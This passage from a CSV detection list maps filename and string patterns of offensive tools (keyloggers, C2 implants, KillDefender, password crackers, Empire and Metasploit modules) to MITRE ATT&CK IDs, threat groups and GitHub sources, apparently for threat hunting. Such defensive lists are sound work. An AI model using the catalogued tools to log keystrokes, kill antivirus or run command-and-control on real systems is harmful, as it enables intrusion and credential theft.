T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*keychain2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*keylistattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*keylog_dump*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*keylog_dump*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*keylog_inject *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*keylog_inject.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*keylog_off*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*keylog_on*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*keylog_recorder.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*keylog_recorder.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*keylog_start*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*keylog_stop*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*keylogger dump*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,0,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*keylogger is already off*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*keylogger stopped*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Keylogger*,offensive_tool_keyword,keylogger keyword,keylogger keyword. could be related to keylooger tools ,T1056.001 ,TA0006,N/A,N/A,POST Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Keylogger.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Keylogger.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Keylogger.pdb*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Keylogger.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*keylogger.py*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*keylogrecorder.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*keylooger.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*keyring2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*keyscan dump*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*keyscan start*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*keyscan stop*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*keystore2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*KeyTabExtract*,offensive_tool_keyword,KeyTabExtract,KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash,T1003 - T1552.004 - T1110 - T1210,TA0006 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/sosdave/KeyTabExtract,1,0,N/A,N/A,2,145,36,2020-08-26T01:03:37Z,2019-03-18T15:00:14Z -*keyword_obfuscation*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - 
T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*kgretzky*,offensive_tool_keyword,Github Username,username Kuba Gretzky hosting sniffing and spoofing exploitation tools,N/A,N/A,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kgretzky/evilqr*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*kgretzky/pwndrop*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*kh4sh3i/Spring-CVE*,offensive_tool_keyword,POC,POC exploit for CVE-2022-22963,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/kh4sh3i/Spring-CVE,1,1,N/A,N/A,1,13,7,2022-03-31T20:58:54Z,2022-03-31T20:19:51Z -*khast3x*,offensive_tool_keyword,Github Username,Red team exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/khast3x,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*khast3x/h8mail*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information 
Gathering,https://github.com/opencubicles/h8mail,1,1,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*Kicking off download cradle in a new process*,offensive_tool_keyword,empire,empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*kick-operator -n *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - 
T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*killAllNimplants*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*killav.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*killdefender check*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,0,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*killdefender kill*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,0,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*KillDefender.h*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,1,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*KillDefender.x64*,offensive_tool_keyword,cobaltstrike,BOF 
combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*KillDefender.x64.*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,1,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*KillDefender_BOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,1,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*killdefender_bof*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*KillDefenderBOF-main*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,1,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*Killed running eventvwr*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-EventVwrBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Killed running sdclt*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
